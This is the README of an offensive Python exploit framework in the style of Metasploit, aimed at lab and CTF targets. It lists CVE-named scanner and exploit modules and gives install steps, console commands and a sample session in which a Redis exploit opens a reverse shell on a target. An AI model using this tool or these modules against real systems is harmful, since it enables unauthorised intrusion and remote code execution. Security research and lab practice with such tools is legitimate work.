模块化 Python 漏洞利用框架,具有 Metasploit 风格的命令行控制台、自动注册的 Exploit 和 Auxiliary 模块、三态检查,以及面向实验环境和 CTF 目标的多种会话传输方式。
███╗ ███╗███████╗████████╗██╗███████╗
████╗ ████║██╔════╝╚══██╔══╝██║██╔════╝
██╔████╔██║█████╗ ██║ ██║███████╗
██║╚██╔╝██║██╔══╝ ██║ ██║╚════██║
██║ ╚═╝ ██║███████╗ ██║ ██║███████║
╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═╝╚══════╝
一个为学习而构建的 Python 利用框架。模块化架构、主题化控制台、多种会话传输方式,以及不断增长的 CVE 模块库。
METIS 是一个社区驱动的安全研究框架。目标是构建一个由安全研究人员、开发者和更广泛社区贡献的、不断增长的模块集合。
有实用的扫描器、辅助模块、利用模块或其他安全研究工具想要分享?将它添加到 METIS 并提交 Pull Request。
只要遵循项目的模块结构、编码规范和授权使用准则,所有贡献都欢迎。
无论你是添加新的 CVE 模块、改进现有模块、修复 bug,还是构建新的框架功能,你的贡献都能帮助 METIS 变得更好。
有关创建自己模块的信息,请参阅下方的 编写模块。
METIS 是一个用 Python 编写的模块化 C2/利用框架。它运行一个 Metasploit 风格的交互式控制台,你可以在其中选择模块、设置选项、运行检查,并针对实验环境目标获取会话。
它专为以下用途设计:
它不适用于:
.py 文件放入 modules/ 即可自动注册Exploit(生成会话)和 Auxiliary(扫描器、枚举器)check() — 每个模块都能在攻击前进行验证(VULNERABLE / SAFE / UNKNOWN)file: 目标规格,并带有实时进度条KEY=VALUE 文件加载选项| 模块 | 描述 |
|---|---|
auxiliary/scanner/tcp_connect | 多线程 TCP 端口扫描器 |
auxiliary/scanner/hikvision_cve_2017_7921 | 海康威视 IP 摄像头认证绕过 + 用户枚举 |
auxiliary/scanner/mikrotik_winbox_creds_cve_2018_14847 | MikroTik WinBox 凭据泄露 |
auxiliary/scanner/redis_cve_2022_0543 | Redis Lua 沙箱逃逸检测器 |
| 模块 | 会话类型 |
|---|---|
exploit/unix/ftp/vsftpd_234_backdoor | 绑定套接字 |
exploit/multi/http/ghost_cms_handlebars_rce | 反向套接字 |
exploit/multi/http/langflow_rce_cve_2026_9198 | 反向套接字 |
exploit/multi/http/budibase_plugin_upload_rce_cve_2026_31816 | 反向套接字 |
exploit/multi/http/activemq_jolokia_rce_cve_2026_34197 | 反向套接字 |
exploit/multi/http/tomcat_put_rce_cve_2017_12615 | 反向套接字 |
exploit/multi/http/joomla_jce_rce_cve_2026_48907 | HTTP webshell |
exploit/linux/http/freepbx_sqli_rce_cve_2025_57819 | 延迟反向(cron) |
exploit/linux/redis/redis_cve_2022_0543_rce | 反向套接字 |
exploit/linux/ssh/libssh_auth_bypass_cve_2018_10933 | Paramiko 通道 |
exploit/linux/telnet/inetutils_telnetd_bypass_cve_2026_24061 | 原始 telnet 套接字 |
需要 Python 3.10+ 和 git。
git clone https://github.com/K3ysTr0K3R/METIS.git
cd METIS
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt
requirements.txt:
pwntools>=4.11.0
requests>=2.31.0
paramiko>=3.0.0
redis>=5.0.0
cryptography>=42.0.0
rich>=13.7.0
prompt_toolkit>=3.0.43
运行:
python3 metis.py
metis > show modules
# Module Date Rank Chk Description
-- ------------------------------------------------------------ ---------- --------- --- -----------
1 auxiliary/scanner/hikvision_cve_2017_7921 2017-09-23 normal Yes Hikvision IP Camera Authentication Bypass (CVE-2017-7921)
2 auxiliary/scanner/mikrotik_winbox_creds_cve_2018_14847 2018-08-01 great Yes MikroTik WinBox Credential Leak (CVE-2018-14847)
...
15 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent Yes vsftpd 2.3.4 Backdoor Command Execution
metis > search redis
# Module Date Rank Chk Description
-- ------ ---- ---- --- -----------
1 auxiliary/scanner/redis_cve_2022_0543 2022-02-18 excellent Yes Redis CVE-2022-0543 Scanner
2 exploit/linux/redis/redis_cve_2022_0543_rce 2022-02-18 excellent Yes Redis CVE-2022-0543 Lua Sandbox Escape RCE
metis > use 2
[*] using exploit/linux/redis/redis_cve_2022_0543_rce
metis exploit(linux/redis/redis_cve_2022_0543_rce) > set RHOST 192.168.56.101
[+] RHOST => 192.168.56.101
metis exploit(linux/redis/redis_cve_2022_0543_rce) > set LHOST 192.168.56.1
[+] LHOST => 192.168.56.1
metis exploit(linux/redis/redis_cve_2022_0543_rce) > check
[*] check: probing 192.168.56.101:6379
[VULNERABLE] check: 192.168.56.101 vulnerable to CVE-2022-0543
[*] check -> vulnerable
metis exploit(linux/redis/redis_cve_2022_0543_rce) > exploit
[*] running check() before exploit (AUTOCHECK=true)
[VULNERABLE] check: 192.168.56.101 vulnerable to CVE-2022-0543
[+] target appears vulnerable — proceeding
[*] listening on 192.168.56.1:4444 for reverse shell
[+] shell from 192.168.56.101:51234
[+] new session: <Session a3f2b1c4 192.168.56.101:51234>
metis exploit(linux/redis/redis_cve_2022_0543_rce) > sessions
a3f2b1c4 192.168.56.101:51234 (alive)
metis exploit(linux/redis/redis_cve_2022_0543_rce) > interact a3f2b1c4
[*] interacting with a3f2b1c4. 'background' returns, '!cmd' runs locally.
a3f2b1c4 $ id
uid=105(redis) gid=108(redis) groups=108(redis)
a3f2b1c4 $ background
metis >
| 命令 | 效果 |
|---|---|
show modules | 列出所有模块及其元数据 |
search <term> | 按路径、名称、描述或 CVE 搜索 |
use <N|path> | 按编号或路径选择模块 |
set <OPT> <val> | 设置模块选项 |
setg <OPT> <val> | 设置全局选项(应用于所有模块) |
check | 运行模块的非破坏性 check() |
run / exploit | 执行模块 |
sessions | 列出活动会话 |
interact <sid> | 进入某个会话 |
connect <host> <port> | 连接到绑定 shell |
listen <host> <port> | 启动原始 TCP 处理器 |
resource <file.rc> | 从 RC 文件执行命令 |
theme <name> | 切换主题(22 种可用) |
gradient | 配置进度条渐变 |
!<cmd> | 运行本地 shell 命令 |
shell | 进入交互式本地 shell |
exit | 退出 |
对于辅助扫描器,使用 RHOSTS。它接受:
set RHOSTS 192.168.56.101
set RHOSTS 192.168.56.101,192.168.56.102,10.0.0.5
set RHOSTS 192.168.56.0/24
set RHOSTS 192.168.56.100-192.168.56.120
set RHOSTS file:/path/to/targets.txt
文件可以包含上述任意格式,每行一个,并支持 # 注释。
对于利用模块,RHOST 接受单个目标。
22 种内置配色方案。不带参数的 theme 会列出所有主题及其预览。
theme synthwave theme cyberpunk theme tokyo
theme dracula theme nord theme gruvbox
theme catppuccin theme rose-pine theme kanagawa
theme everforest theme solarized theme one
theme ocean theme arctic theme blood
theme blade theme matrix theme mono
theme miami theme synthwave-crt theme ansi16
启动时默认为 synthwave。可通过以下方式覆盖:
METIS_THEME=ocean python3 metis.py
自动化工作流程: